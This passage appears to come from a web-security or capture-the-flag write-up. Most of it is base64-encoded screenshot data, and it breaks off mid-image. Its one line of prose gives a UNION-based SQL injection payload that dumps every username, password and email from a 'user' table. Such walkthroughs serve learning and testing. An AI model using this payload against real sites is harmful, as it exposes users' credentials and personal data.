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) Lets now pull out all of the `user` table in the same way: `' UNION ALL SELECT group_concat(username)||'::'||group_concat(password)||'::'||group_concat(email), group_concat(about) FROM user WHERE ''='`. ![](data:image/png;base64,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